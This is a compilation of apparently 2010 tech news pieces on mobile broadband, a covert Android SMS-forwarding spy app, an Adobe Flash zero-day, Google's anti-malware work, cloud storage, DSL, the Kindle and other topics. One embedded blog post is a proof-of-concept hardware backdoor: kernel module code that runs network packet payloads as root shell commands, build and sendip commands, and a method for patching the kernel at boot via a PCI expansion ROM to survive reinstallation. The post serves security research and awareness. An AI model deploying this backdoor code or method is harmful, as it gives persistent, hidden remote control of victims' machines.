Obviously, this illustrates that even if it isn't integrated into the iPad, users are happy to choose the advantages of a 4G connection (if unavailable, the Overdrive reverts to using 3G) even if its not built into the iPad rather than opt for a slower iPad 3G (the generally noted speed range of 4G is 3 to 6 Mbps, considerably faster than 600 Kbps to 1 Mbps offered by 3G).

There are other advantages to choosing a Wi-Fi-only model over the integrated 3G one as well (worth noting since the Wi-Fi iPad went on sale at Verizon stores yesterday, where it can be purchased along with a 3G Wi-Fi card with discounted data plans) – and these advantages aren't just limited to the iPad. They apply to any devices that offer a choice between Wi-Fi and integrated 3G models including many netbooks, e-readers like the Kindle and Nook, and the forthcoming Android-based Galaxy Tab.

Some of the big advantage are:

* Multiple devices (not just an iPad, e-reader, or notebook) – big plus for families
* Choice of carriers – including regional carriers (pick the best network, and best service plan for you)
* Potential discount if added to an existing service plan (depends on the carrier)
* Optional 4G (where available)
* Potential for contract-free/prepaid service from the likes of Cricket and Virgin Mobile (great if you don't need service all the time)
* Ease of upgrade (4G service is expected to be available from all major carriers soon and you'll probably want the faster speed when its available without replacing each 3G device)

While a MiFi solution may not be a need for everyone, its certainly worth considering and examining the potential total cost of ownership for a device over a few years (particularly if you're looking at a carrier-subsidized tablet or netbook that will offer lower investment in the device itself but tie you to a contract specific to that device).

Android App Forwards Private Text Messages
Nick Bilton

DLP Mobile Promotional video for Secret SMS Replicator.

If you own an Android phone and are cheating on a significant other by arranging secret trysts through text messages, you might want to think twice about your infidelities — or at least about arranging them via texts.

A new Android application released Wednesday, Secret SMS Replicator, when secretly installed on a cellphone, will forward all text messages to any other phone without the owner’s knowledge.

Zak Tanjeloff, chief executive of the app’s creator, DLP Mobile, said in a press release: “This app is certainly controversial, but can be helpful to people in relationships where this type of monitoring can be useful.”

DLP Mobile also boasts about the clandestine nature of the application: “The app is unique because there is no visible icon or shortcut to access it, so once it’s installed, it will continue to monitor without revealing itself.”

DLP Mobile is behind the Mirror App for the iPhone 4 and says it creates about 100 applications a year for the iPhone and Android.

Mr. Tanjeloff said in a phone interview that his company decided to build the SMS application for the Android platform because it would not need to be reviewed before it reached users.

“We can’t build it for the iPhone because it wouldn’t make it past the App Store approval process,” Mr. Tanjeloff said.

Some might argue that this app makes the approval process look like a good idea.

For those who want to avoid having their text messages tapped, Mr. Tanjeloff suggested “keeping your phone close by, or make sure people trust you.”

Hackers Exploit Newest Flash Zero-Day Bug

Adobe confirms attacks using rigged PDFs, promises fixes next month as more problems plague Flash, Reader
Gregg Keizer

Adobe today confirmed that hackers are exploiting a critical unpatched bug in Flash Player, and promised to patch the vulnerability in two weeks.

The company issued a security advisory that also named Adobe Reader and Acrobat as vulnerable.

"There are reports that this vulnerability is being actively exploited in the wild against Adobe Reader and Acrobat," said Adobe in its warning. The company said it's seen no sign that hackers are also targeting Flash Player itself.

Those reports came from Mila Parkour, an independent security researcher who notified Adobe early today after spotting and then analyzing a malicious PDF file. According to Parkour, the rigged PDF document exploits the Flash bug in Reader, then drops a Trojan horse and other malware on the victimized machine.

Adobe said that all versions of Flash on Windows, Mac, Linux and Android harbored the bug, and that the "Authplay" component of Reader and Acrobat 9.x and earlier also contained the flaw. Authplay is the interpreter that renders Flash content embedded within PDF files.

Last month, Parkour uncovered a bug in Reader's font-rendering technology that was exploited by attack campaigns using bogus messages from renowned golf coach David Leadbetter as click bait.

Today's vulnerability, however, is more reminiscent of one reported in June that also involved Authplay. Adobe issued an emergency patch for Flash Player within a week, and followed with a fix for Reader and Acrobat two weeks later.

Adobe will patch this newest bug in a similar fashion. Today it promised to issue a fix for Flash by Nov. 9, and updates for Reader and Acrobat the following week.

Danish vulnerability tracker Secunia ranked the Flash flaw as "extremely critical," its highest threat ranking, and said criminals could use it to compromise systems and execute malicious code.

Security experts have regularly criticized Adobe Flash's security, with some questioning the company's decision to integrate the media player's capabilities within the almost-as-popular Reader. Adobe has countered those arguments with its own, saying that many users rely on the functionality.

Until a patch is available, users can protect themselves from active attacks by deleting the "authplay.dll" file that ships with Reader and Acrobat. It gave the same advice in June when the earlier Flash vulnerability was reported.

Dumping authplay.dll, however, will crash Reader and Acrobat or produce an error message when the software opens a PDF file containing Flash content.

Today's Flash flaw disclosure was the second Adobe's acknowledged since the technology was ported to Google's Android operating system two months ago.

Although Adobe tries to hew to a quarterly patch schedule for Reader and Acrobat, it's repeatedly been forced to scuttle those plans to issue rush fixes for critical bugs. The next regularly-scheduled Reader update was not supposed to land until Feb. 8, 2011.

At times, Adobe has abandoned scheduled Reader updates after shipping an "out-of-band" patch, but that's unlikely here as the company is in the early days of its next patch cycle.

Hosting Backdoors in Hardware

Have you ever had a machine get compromised? What did you do? Did you run rootkit checkers and reboot? Did you restore from backups or wipe and reinstall the machines, to remove any potential backdoors?

In some cases, that may not be enough. In this blog post, we’re going to describe how we can gain full control of someone’s machine by giving them a piece of hardware which they install into their computer. The backdoor won’t leave any trace on the disk, so it won’t be eliminated even if the operating system is reinstalled. It’s important to note that our ability to do this does not depend on exploiting any bugs in the operating system or other software; our hardware-based backdoor would work even if all the software on the system worked perfectly as designed.

I’ll let you figure out the social engineering side of getting the hardware installed (birthday “present”?), and instead focus on some of the technical details involved.

Our goal is to produce a PCI card which, when present in a machine running Linux, modifies the kernel so that we can control the machine remotely over the Internet. We’re going to make the simplifying assumption that we have a virtual machine which is a replica of the actual target machine. In particular, we know the architecture and exact kernel version of the target machine. Our proof-of-concept code will be written to only work on this specific kernel version, but it’s mainly just a matter of engineering effort to support a wide range of kernels.

Modifying the kernel with a kernel module

The easiest way to modify the behavior of our kernel is by loading a kernel module. Let’s start by writing a module that will allow us to remotely control a machine.

IP packets have a field called the protocol number, which is how systems distinguish between TCP and UDP and other protocols. We’re going to pick an unused protocol number, say, 163, and have our module listen for packets with that protocol number. When we receive one, we’ll execute its data payload in a shell running as root. This will give us complete remote control of the machine.

The Linux kernel has a global table inet_protos consisting of a struct net_protocol * for each protocol number. The important field for our purposes is handler, a pointer to a function which takes a single argument of type struct sk_buff *. Whenever the Linux kernel receives an IP packet, it looks up the entry in inet_protos corresponding to the protocol number of the packet, and if the entry is not NULL, it passes the packet to the handler function. The struct sk_buff type is quite complicated, but the only field we care about is the data field, which is a pointer to the beginning of the payload of the packet (everything after the IP header). We want to pass the payload as commands to a shell running with root privileges. We can create a user-mode process running as root using the call_usermodehelper function, so our handler looks like this:

int exec_packet(struct sk_buff *skb)
char *argv[4] = {"/bin/sh", "-c", skb->data, NULL};
char *envp[1] = {NULL};

call_usermodehelper("/bin/sh", argv, envp, UMH_NO_WAIT);

return 0;

We also have to define a struct net_protocol which points to our packet handler, and register it when our module is loaded:

const struct net_protocol proto163_protocol = {
.handler = exec_packet,
.no_policy = 1,
.netns_ok = 1

int init_module(void)
return (inet_add_protocol(&proto163_protocol, 163) < 0);

Let’s build and load the module:

rwbarton@target:~$ make
make -C /lib/modules/2.6.32-24-generic/build M=/home/rwbarton modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-24-generic'
CC [M] /home/rwbarton/exec163.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/rwbarton/exec163.mod.o
LD [M] /home/rwbarton/exec163.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-24-generic'
rwbarton@target:~$ sudo insmod exec163.ko

Now we can use sendip (available in the sendip Ubuntu package) to construct and send a packet with protocol number 163 from a second machine (named control) to the target machine:

rwbarton@control:~$ echo -ne 'touch /tmp/x\0' > payload
rwbarton@control:~$ sudo sendip -p ipv4 -is 0 -ip 163 -f payload $targetip

rwbarton@target:~$ ls -l /tmp/x
-rw-r--r-- 1 root root 0 2010-10-12 14:53 /tmp/x

Great! It worked. Note that we have to send a null-terminated string in the payload, because that’s what call_usermodehelper expects to find in argv and we didn’t add a terminator in exec_packet.

Modifying the on-disk kernel

In the previous section we used the module loader to make our changes to the running kernel. Our next goal is to make these changes by altering the kernel on the disk. This is basically an application of ordinary binary patching techniques, so we’re just going to give a high-level overview of what needs to be done.

The kernel lives in the /boot directory; on my test system, it’s called /boot/vmlinuz-2.6.32-24-generic. This file actually contains a compressed version of the kernel, along with the code which decompresses it and then jumps to the start. We’re going to modify this code to make a few changes to the decompressed image before executing it, which have the same effect as loading our kernel module did in the previous section.

When we used the kernel module loader to make our changes to the kernel, the module loader performed three important tasks for us:

1. it allocated kernel memory to store our kernel module, including both code (the exec_packet function) and data (proto163_protocol and the string constants in exec_packet) sections;
2. it performed relocations, so that, for example, exec_packet knows the addresses of the kernel functions it needs to call such as kfree_skb, as well as the addresses of its string constants;
3. it ran our init_module function.

We have to address each of these points in figuring out how to apply our changes without making use of the module loader.

The second and third points are relatively straightforward thanks to our simplifying assumption that we know the exact kernel version on the target system. We can look up the addresses of the kernel functions our module needs to call by hand, and define them as constants in our code. We can also easily patch the kernel’s startup function to install a pointer to our proto163_protocol in inet_protos[163], since we have an exact copy of its code.

The first point is a little tricky. Normally, we would call kmalloc to allocate some memory to store our module’s code and data, but we need to make our changes before the kernel has started running, so the memory allocator won’t be initialized yet. We could try to find some code to patch that runs late enough that it is safe to call kmalloc, but we’d still have to find somewhere to store that extra code.

What we’re going to do is cheat and find some data which isn’t used for anything terribly important, and overwrite it with our own data. In general, it’s hard to be sure what a given chunk of kernel image is used for; even a large chunk of zeros might be part of an important lookup table. However, we can be rather confident that any error messages in the kernel image are not used for anything besides being displayed to the user. We just need to find an error message which is long enough to provide space for our data, and obscure enough that it’s unlikely to ever be triggered. We’ll need well under 180 bytes for our data, so let’s look for strings in the kernel image which are at least that long:

rwbarton@target:~$ strings vmlinux | egrep '^.{180}' | less

One of the output lines is this one:

<4>Attempt to access file with crypto metadata only in the extended attribute region, but eCryptfs was mounted without xattr support enabled. eCryptfs will not treat this like an encrypted file.

This sounds pretty obscure to me, and a Google search doesn’t find any occurrences of this message which aren’t from the kernel source code. So, we’re going to just overwrite it with our data.

Having worked out what changes need to be applied to the decompressed kernel, we can modify the vmlinuz file so that it applies these changes after performing the decompression. Again, we need to find a place to store our added code, and conveniently enough, there are a bunch of strings used as error messages (in case decompression fails). We don’t expect the decompression to fail, because we didn’t modify the compressed image at all. So we’ll overwrite those error messages with code that applies our patches to the decompressed kernel, and modify the code in vmlinuz that decompresses the kernel to jump to our code after doing so. The changes amount to 5 bytes to write that jmp instruction, and about 200 bytes for the code and data that we use to patch the decompressed kernel.

Modifying the kernel during the boot process

Our end goal, however, is not to actually modify the on-disk kernel at all, but to create a piece of hardware which, if present in the target machine when it is booted, will cause our changes to be applied to the kernel. How can we accomplish that?

The PCI specification defines a “expansion ROM” mechanism whereby a PCI card can include a bit of code for the BIOS to execute during the boot procedure. This is intended to give the hardware a chance to initialize itself, but we can also use it for our own purposes. To figure out what code we need to include on our expansion ROM, we need to know a little more about the boot process.

When a machine boots up, the BIOS initializes the hardware, then loads the master boot record from the boot device, generally a hard drive. Disks are traditionally divided into conceptual units called sectors of 512 bytes each. The master boot record is the first sector on the drive. After loading the master boot record into memory, the BIOS jumps to the beginning of the record.

On my test system, the master boot record was installed by GRUB. It contains code to load the rest of the GRUB boot loader, which in turn loads the /boot/vmlinuz-2.6.32-24-generic image from the disk and executes it. GRUB contains a built-in driver which understands the ext4 filesystem layout. However, it relies on the BIOS to actually read data from the disk, in much the same way that a user-level program relies on an operating system to access the hardware. Roughly speaking, when GRUB wants to read some sectors off the disk, it loads the start sector, number of sectors to read, and target address into registers, and then invokes the int 0x13 instruction to raise an interrupt. The CPU has a table of interrupt descriptors, which specify for each interrupt number a function pointer to call when that interrupt is raised. During initialization, the BIOS sets up these function pointers so that, for example, the entry corresponding to interrupt 0x13 points to the BIOS code handling hard drive IO.

Our expansion ROM is run after the BIOS sets up these interrupt descriptors, but before the master boot record is read from the disk. So what we’ll do in the expansion ROM code is overwrite the entry for interrupt 0x13. This is actually a legitimate technique which we would use if we were writing an expansion ROM for some kind of exotic hard drive controller, which a generic BIOS wouldn’t know how to read, so that we could boot off of the exotic hard drive. In our case, though, what we’re going to make the int 0x13 handler do is to call the original interrupt handler, then check whether the data we read matches one of the sectors of /boot/vmlinuz-2.6.32-24-generic that we need to patch. The ext4 filesystem stores files aligned on sector boundaries, so we can easily determine whether we need to patch a sector that’s just been read by inspecting the first few bytes of the sector. Then we return from our custom int 0x13 handler. The code for this handler will be stored on our expansion ROM, and the entry point of our expansion ROM will set up the interrupt descriptor entry to point to it.

In summary, the boot process of the system with our PCI card inserted looks like this:

* The BIOS starts up and performs basic initialization, including setting up the interrupt descriptor table.
* The BIOS runs our expansion ROM code, which hooks the int 0x13 handler so that it will apply our patch to the vmlinuz file when it is read off the disk.
* The BIOS loads the master boot record installed by GRUB, and jumps to it. The master boot record loads the rest of GRUB.
* GRUB reads the vmlinuz file from the disk, but our custom int 0x13 handler applies our patches to the kernel before returning.
* GRUB jumps to the vmlinuz entry point, which decompresses the kernel image. Our modifications to vmlinuz cause it to overwrite a string constant with our exec_packet function and associated data, and also to overwrite the end of the startup code to install a pointer to this data in inet_protos[163].
* The startup code of the decompressed kernel runs and installs our handler in inet_protos[163].
* The kernel continues to boot normally.

We can now control the machine remotely over the Internet by sending it packets with protocol number 163.

One neat thing about this setup is that it’s not so easy to detect that anything unusual has happened. The running Linux system reads from the disk using its own drivers, not BIOS calls via the real-mode interrupt table, so inspecting the on-disk kernel image will correctly show that it is unmodified. For the same reason, if we use our remote control of the machine to install some malicious software which is then detected by the system administrator, the usual procedure of reinstalling the operating system and restoring data from backups will not remove our backdoor, since it is not stored on the disk at all.

What does all this mean in practice? Just like you should not run untrusted software, you should not install hardware provided by untrusted sources. Unless you work for something like a government intelligence agency, though, you shouldn’t realistically worry about installing commodity hardware from reputable vendors. After all, you’re already also trusting the manufacturer of your processor, RAM, etc., as well as your operating system and compiler providers. Of course, most real-world vulnerabilities are due to mistakes and not malice. An attacker can gain control of systems by exploiting bugs in popular operating systems much more easily than by distributing malicious hardware.

Inside Google's Anti-Malware Operation
Dennis Fisher

A Google malware researcher gave a rare peek inside the company's massive anti-malware and anti-phishing efforts at the SecTor conference here, and the data that the company has gathered shows that the attackers who make it their business to infect sites and exploit users are adapting their tactics very quickly and creatively to combat the efforts of Google and others.

While Google is still a relative newcomer to the public security scene, the company has deployed a number of services and technologies recently that are designed to identify phishing sites as well as sites serving malware and prevent users from finding them. The tools include the Google SafeBrowsing API and a handful of services that are available to help site owners and network administrators find and eliminate malware and the attendant bugs from their sites.

All of these are related to Google's constant crawling of the Web, which, among many other things, allows the company to identify malware-distribution sites as well as legitimate sites that have been compromised with injected malicious code. Attackers have taken to infecting legitimate sites for a number of reasons, one of which is that those sites will show up more prominently in Google search results.

To find malware-distribution sites, Google uses a huge number of virtual machines running completely unpatched versions of Windows and Internet Explorer that they point at potentially malicious URLs. The company then ties this in with the data that it gathers from its automated crawlers that are tasked with looking for malicious code on legitimate Web sites.

Fabrice Jaubert, of Google's anti-malware team, said that the company has had good luck identifying and weeding out malicious sites of late. Still, as much as 1.5 percent of all search result pages on Google include links to at least one malware-distribution site, he said.

"There's a lot of fluctuation in that over time, and that could be due to a lot of factors. It could be due to a change in the pages, it could be a change in our detection rate and also in the popularity of the infected pages," Jaubert said. "The biggest factor is that we've found a substantial number of malware pages are spammy and have no content. We remove those pages. But it's a cat-and-mouse game, just like viruses and AV. We go and find bad pages and they get better at hiding them."

A major part of this infection and distribution ecosystem is the huge population of Web servers with unpatched vulnerabilities, which the attackers exploit in order to inject malicious code. That code, often in hidden iFrames, typically redirects users to another site where malware is installed on the victim's machine via a drive-by download.

However, Jaubert said that the attackers recently have shifted their tactics somewhat as Google and others involved in the battle against Web-based exploits have gotten better at identifying and eliminating malware download sites. Now, some crews have started eschewing the extra step of redirecting users to a third-party site and are simply loading the malware on the compromised legitimate site and using that site for malware distribution as well.

It's a subtle shift, but it removes the dedicated malware-distribution pages, which are usually easily identifiable, from the equation, making the operation more efficient and more likely to succeed in the long run.

Still, despite the vast amount of data that Google collects and analyzes, there's a lot about the way that the malware ecosystem works that the company's security teams don't have a firm grasp on yet.

"We don't understand all the details of this. We focus on the technical," Jaubert said. "There's monetization aspects that we don't have visibility into."

Most Americans Support an Internet Kill Switch

Sixty-one percent of Americans said the President should have the ability to shut down portions of the Internet in the event of a coordinated malicious cyber attack, according to research by Unisys.

The survey found that while Americans are taking proactive steps to protect themselves against cybercrime and identity theft, only slightly more than a third of Internet users in the U.S. regularly use and update passwords on their mobile devices – creating a potentially huge security hole for organizations as more consumer devices invade the workplace.

The findings illustrate that recent events such as the Stuxnet computer worm attack and the attempted Times Square car bombing may have heightened the American public's awareness of and concern over global and domestic cybersecurity threats.

The findings also suggest the public may support a pending cybersecurity bill that would give the President far-reaching authority over the Internet in the case of an emergency.

"A majority of the American population is willing to grant the President the authority to cut short their Internet access to protect both U.S. assets and citizens, suggesting that the public is taking cyber warfare very seriously," said Patricia Titus, VP and CISO, Unisys. "Our survey shows that the American public recognizes the danger of a cyber attack and wants the federal government to take an active role in extending the nation's cyber defense. It will be up to officials in all branches of the federal government to respond to this call to action in a way that is measured and well planned."

Mobile devices: A hole in American defenses?

The results also indicate that most Americans are being proactive in protecting themselves from cybercrime and identity theft. More than three-quarters (80%) of Americans regularly limit access to personal information posted to social media sites and make use of privacy settings; and 73% regularly update anti-virus software.

However, the majority of Americans surveyed are neglecting other important aspects of cybersecurity, particularly around their use of consumer devices. Only 37% of users surveyed say they are regularly using and updating passwords on their mobile devices. The survey also found that less than half of American Internet users (46%) regularly use and update hard-to-guess passwords on their computers.

Overall U.S. results

The Unisys Security Index surveys consumer opinion on four areas of security: financial, national, Internet and personal safety. More than 1,000 Americans responded to the latest survey. The results are tallied on a scale of 0-300, with 300 representing the highest level of perceived concern.

The overall score for the current Unisys Security Index for the United States was 136, indicating a moderate level of overall security concern. The overall score declined from 147 since the last survey taken in February 2010, reflecting a decrease in concern across all four areas of security.

National security and financial security continued to rank as the U.S. public's greatest areas of concern, with more than half (59%) "extremely" or "very" concerned about U.S. national security. In addition, 57% percent of Americans were seriously concerned about identity theft, and the same percentage is also seriously concerned about credit card and debit card fraud.

American's fear surrounding Internet security continues to be on the decline with the number of Americans "not concerned" about computer security in relation to viruses or spam increasing to 34%, the greatest number since the Index's inception. The most dramatic decline was reported in those "seriously concerned" about the security of shopping or banking online – from 43% in February 2010 to 34% in August 2010.

Global results

Unisys surveyed more than 10,575 consumers in 11 countries around the world about their current security concerns. Additional key global findings from the survey include:

• Security concerns were highest in Brazil, which reported an overall index score of 185, closely followed by Hong Kong with a score of 172. The Netherlands reported the lowest level of concern with an overall score of 71.
• Bank card fraud is the greatest single area of concern across all eleven countries surveyed. Despite the severity of the worldwide financial crisis, concern about bankcard fraud consistently overshadows concern about meeting financial obligations in countries with serious concerns about financial security.
• Most Europeans take the protection of their online privacy and identity seriously. In Germany, 28% of internet users switched banks or retailers because of unhappiness with their privacy and identity protection or have considered doing so.

Beaming to the Cloud All the Mess That Is Our Digital Life
Sarah J. Wachter

We used to wrestle with managing overstuffed closets and bookcases teetering on collapse. Now our digital closets are overflowing, too: Facebook wall messages. Tweets. LinkedIn profiles and messages. Family photo albums. A music collection from Gustav Mahler to Manu Chao.

Thanks to cloud computing, we now have seemingly limitless, Internet-based storage. But our files are scattered across devices — a smartphone, netbook, e-reader, U.S.B. keys, an MP3 player and a home computer.

Tech giants like Microsoft and Sony, as well as a number of start-ups, are starting to ferret out ways to help us put our electronic lives in order, offering content-management services that allow people to store their digital clutter and reach it from any device.

“We are overwhelmed with digital and virtual assets,” said Matt Anderson, an analyst with the research firm Booz & Co.

The challenge, analysts say, is being able to offer comprehensible and interoperable services for data originating from a plethora of electronic devices.

Booz estimates that the U.S. market for content management services will expand 50 percent over the next four years to hit $4 billion by 2012. Figures for the rest of the world are unavailable.

The business model for such services is in flux, analysts said, as companies experiment with free and fee-based models. A 2009 survey by Booz showed that consumers were willing to pay $9 a month to have a single digital repository for their data and an extra $3 a month to be able to transfer content among devices.

One company dipping its toe into content management is Sony, which will offer a video-on-demand service for home cinema, TV, Blu-ray and Windows laptops in Europe by the end of the year. Sony, which has been experimenting with different pay models, also has a monthly music subscription service, called Music Unlimited, that allows subscribers to find and share music from Sony devices and Windows laptops.

Sony says it will eventually open up those services to devices running on other operating systems and may make them accessible to Mac users, said Nick Sharples, director of European corporate communications for Sony.

Microsoft, also trying to expand its cloud computing offerings, rolled out a service Sept. 31 called Live Mesh that provides 5 gigabytes of storage for free for individuals to sync and store their files, photos and videos in the cloud, making them available to any device, said Dharmesh Mehta, Director of Windows Live Product Management.

The pitfall with such services, analysts say, is the same question that hangs over cloud computing: security and privacy.

“How do you know where the information is going — whether it will be seen by your employer or insurance company?” said Jeffrey Mann, vice president of collaboration and social software with the research firm Gartner. “That’s a huge issue with lots of controversy.”

One rapidly growing service available internationally is SugarSync (www.sugarsync.com), which allows users to store, back up, sync, share and collaborate on data, music and photos and reach that information from any device, anywhere. The company’s offering is free for 2 gigabytes of storage and $9.99 a month for 60 gigabytes.

“We focus on digital chaos,” said Laura Yecies, the chief executive of SugarSync. “Our goal is to give a user a convenient and comprehensive solution, to have access and to manage all of her digital life.”

She said on-the-go professionals, like lawyers and architects, found the service indispensable. SugarSync is also available in four other languages, including Chinese. The company says 65 percent of its customers are in the United States, with the rest around the world.

One group eager to exploit such services is telecommunication companies. Katja Ruud, an analyst with Gartner in Stockholm, says revenue from cloud-based content management services could offset steep declines in traditional fixed-line calling.

A cloud-based address book called MyPhonebook and the ability to store e-mails, contacts, videos, photos and pretty much anything else possible are part of the Connected Life Experiences at Home offered by Deutsche Telekom. The package also provides people with Internet TV and a media center with online storage for films or other TV programs, and the files can be played by any device.

100 Mbps DSL is Here & 800 Mbps is Around the Corner
Om Malik

It is mind boggling to think that copper, thanks to new generation DSL technologies is staying competitive with fiber and cable broadband. Today, a new breakthrough shows that it will only be a matter of time before DSL broadband crosses the 800 Mbps threshold. And while we wait for that massive speed bump, we are beginning to see the commercial availability of DSL that can deliver 100 Mbps.

These recent upgrades in the DSL speeds are coming at a handy time – DSL has started to lose market momentum, and carriers are looking for ways to balance their exploding capital expenditure requirements. While fiber networks are better in the long run, most phone companies need to squeeze out more from their copper networks without losing too much ground to cable broadband rivals. Why? Because they have to shift their capital expenditure dollars to beefing up wireless networks, which themselves are growing through an explosive growth.

Ikanos, a maker of broadband chips today introduced a new technology, NodeScale Vectoring, DSL access technology that allows connections at 100 Mbps and higher, something which has not been possible on many of the phone company networks. According to the chipmaker, the cost of deploying this technology is about a tenth of the cost of building a fiber to the home network.

The NodeScale technology allows carriers to eliminate the crosstalk that occurs on copper pairs when offering very high-speed Internet. The cross talk introduces noise in the network, which in turn limits the line quality and thus reduces the performance of the network. Typically, to handle crosstalk issues, one needs gigabytes of memory. There are two ways of handling cross talk. NodeScale essentially tames cross talk at the DSLAM level as opposed to line card vectoring which treats every line card as a separate crosstalk domain.

Ikanos claims its NodeScale Vectoring technology cancels noise efficiently, and ZTE Corporation will demonstrate the first DSLAM employing the technology. The technology was developed in-house, but Ikanos also licensed the dynamic DSL technology developed by DSL pioneer John Cioffi’s ASSIA.

Back in 2006, Professor Cioffi (of Stanford University) told me that it would be possible to hit Gigabit speeds over DSL. We are inching pretty close to that. We have written about many experiments which have pushed DSL speeds to over 300 Mbps in lab conditions. Huawei, the Chinese telecom equipment maker recently announced that it has tested speeds of up to 700 Mbps.

Today, Nokia Siemens Networks took that even further, announcing that it has tested a technology that could boost the data-carrying capacity of standard copper wires to 825 Mbps over a distance of 400 meters of bonded copper lines and 750 Mbps over a distance of 500 meters. If it is made commercial, it would allow the carriers to eek out more from their copper infrastructure.

NSN does this by the creation of phantom (or virtual) channels that “supplement the two physical wires that are the standard configuration for copper transmission lines.” The approach is called Phantom DSL and can boost bandwidth by between 50 percent to 75 percent over the existing bonded copper lines. NSN hopes to make it part of its DSLAM products. Alcatel-Lucent’s Bell Labs came up with the Phantom DSL technology and announced it back in April 2010.

Amazon Extends Value of Kindle with New Lending Feature
Tony Bradley

Amazon announced that it will soon update the Kindle software to allow users to lend and share Kindle books. The new feature is a welcome addition--catching the Kindle up with the rival Nook e-reader, and enhancing the value of the Kindle as a business tool.

The Kindle is marketed primarily as a consumer gadget, but it also offers a number of benefits and advantages as a business device. It is small and light--much more portable than a notebook, or netbook, or even a tablet device like the iPad. It is a cost-saving productivity tool that has a variety of valid business uses.

The Kindle is not marketed as a business tool, but it has many valid uses for business.Rather than printing out hard copies of lengthy business documents, they can simply be converted to PDF and stored in the Kindle. Hefty reference sources such as Gray's Anatomy, or Dosage Calculation Practices for Nurses could be readily available in the palm of the hand--making them much more functional and valuable than a hardcover book sitting on a shelf somewhere.

The Kindle also offers the benefit of virtually ubiquitous cross-platform access that remains synced up between devices. Aside from the Kindle device itself, users can also access their Kindle library from a Windows or Mac PC, an iPhone, iPad, Android smartphone, or BlackBerry device. Kindle remembers where you're at in the book even as you switch between platforms, and notes and highlights are synced between them as well.

So, what's the big deal with the new lending feature? There are plenty of situations where an employee or co-worker might need to use a given title, but not forever. Since the need is temporary, one Kindle edition can be purchased by the business and farmed out to employees on an as-needed basis.

Details are sparse at this point on how the lending might work for proprietary documents like PDF files, and whether or not comments and highlighting are preserved as the document is shared, but assuming that is the case, the ability to lend such documents could enable teamwork and collaboration.

Just as with an actual book--you know, the kind made from bound paper--the owner of the Kindle e-book can not access or use the title while it is on loan. It is also not possible to loan the same book to more than one person at a time.

Amazon says that not all books will be eligible for lending, and also imposes a restriction (similar to the rival Barnes and Noble Nook) that the same book can not be loaned to the same person more than once. That is a limitation that hinders the value of lending in a business setting--since a user may need to reference the same shared title on more than one occasion.

’60s Sondheim TV Show Is Now on (Legal) DVD
Erik Piepenburg

Attention Stephen Sondheim groupies: You’ve lost bragging rights to your bootleg copies of “Evening Primrose.”

A digitally restored and remastered DVD of the 1966 television musical, holy grail for Sondheim completists, is being released on Tuesday — the first time the entire program will be available commercially to the public in any format.

The surreal 50-minute musical, adapted by James Goldman from a 1940 short story by John Collier, follows a poet named Charles Snell (a post-“Psycho,” still creepy Anthony Perkins), who becomes so disillusioned with the real world that he decides to make his home inside a New York City department store, with, as he sings, its “forty pianos and ten thousand shoes.”

Hiding out after hours he finds a community of eccentric hermits who evade security by pretending to be mannequins. Charles eventually falls in love with Ella (Charmian Carr, who played the oldest daughter in the film version of “The Sound of Music”), a maid being held against her will (long story). The two try to escape from the store but are hunted by the mysterious “dark men” so they won’t expose the secret society. “The story is whimsical, it’s quirky, and it’s macabre,” said Jane Klain, the manager of research services at the Paley Center for Media, who wrote the liner notes for the new DVD.

“Evening Primrose” was broadcast only once, on Nov. 16, 1966, on “ABC Stage 67,” the network’s short-lived cultural series. By that time Mr. Sondheim had already achieved success with “West Side Story,” “Gypsy” and “A Funny Thing Happened on the Way to the Forum.” But his most recent musicals, “Anyone Can Whistle” and “Do I Hear a Waltz?,” had received decidedly less acclaim.

Opportunities to see or hear “Evening Primrose” in its entirety since have been limited. Bootleg copies have circulated among Sondheim aficionados and on YouTube, and the Paley Center has a copy for viewing by appointment.

Thanks in part to a 2001 studio recording (with Neil Patrick Harris as Charles) and an original television soundtrack recording officially released in 2008, the song “Take Me to the World” has become well known. Barbara Cook sang it in the recent Broadway revue “Sondheim on Sondheim.”

And in what organizers are calling the musical’s North American premiere, a staged reading of “Evening Primrose,” starring Candice Bergen, is scheduled for Monday night at the Gerald W. Lynch Theater at John Jay College, as a benefit for the St. George’s Society of New York.

In a phone interview Mr. Sondheim said he was pleased that the musical was finally being released, even with its scrappy made-for-TV aesthetic. “It was my first experience with a musical for television, and that’s what was fun about it,” he said, adding that he hadn’t yet seen the restored edition.

While the original master tape, which was in color, has never been found, Ms. Klain used for the DVD a newly discovered black-and-white 16-millimeter copy that she said “had never been looked at.” Entertainment One is putting out the disc in partnership with the Archive of American Television, a program of the Academy of Television Arts & Sciences Foundation.

“Evening Primrose” offers Sondheim fans an early glimpse of what would become the composer’s signature style. There are complex rhythms and patter-heavy wordplay, for example, in the opening number, “If You Can Find Me, I’m Here”:

Farewell, Neanderthal neighbors

Swilling your pretzels and beer.

Fair-weather friends,

Will you miss me now?

If you can find me, I’m here.

According to the liner notes, the short taping time allotted for programs on “ABC Stage 67” required that book scenes be completed in single takes, giving the production the feeling of live television. Mr. Sondheim laughed when talking about the rough-and-tumble shooting schedule, pointing out a continuity lapse, visible in the DVD, in which a scarf that Charles wears in one scene of the opening number is suddenly not there in the next.

“It has a vaguely amateur feeling, which I like,” he said.

The DVD also provides a mini-snapshot of New York department-store history. Shots of Perkins walking among shoppers and riding an escalator were filmed one early Sunday morning on location at the old Stern Brothers department store on West 42nd Street. Paul Bogart, the director, explained in an interview included as a DVD extra that rehearsals were originally held at Macy’s but were moved after the retailer soured on the project for unknown reasons.

Ms. Klain suggested that Macy’s may have been worried about copycats trying to establish their own nocturnal society in the store.

“It’s a perfectly valid little fantasy,” said Mr. Sondheim, whose new book, “Finishing the Hat,” a collection of his lyrics and commentary, also comes out on Tuesday. “When you think about it, you can live your whole life in a department store. Everything you need is there, from food to clothes to bathrooms.”

Mr. Sondheim took a little blame for helping “Evening Primrose” make the rounds of the musical theater underground for so long.

“Most of the bootleg copies are out there,” he said, “because I lent it to people.”

Bridge Ratings Takes Radio Through The "Digital Gauntlet"

Bridge Ratings has released an extensive look at the effect of new media on terrestrial radio over the past 12 years, going back to the rise of Napster in the late '90s. Bridge surveyed 3822 persons ages 12-21, who currently listen to the radio, use an MP3 player, listen to Internet radio, use social networking sites, all for at least 30 minutes a week, along with regular cell phone use.

Bridge measured "favoriteness" of listeners ages 12+, looking at how many had a favorite radio station. In the late '90s, approximately 85 percent of the demo had a favorite station, but by 2010, this measurement has fallen to just over 72 percent of listeners.

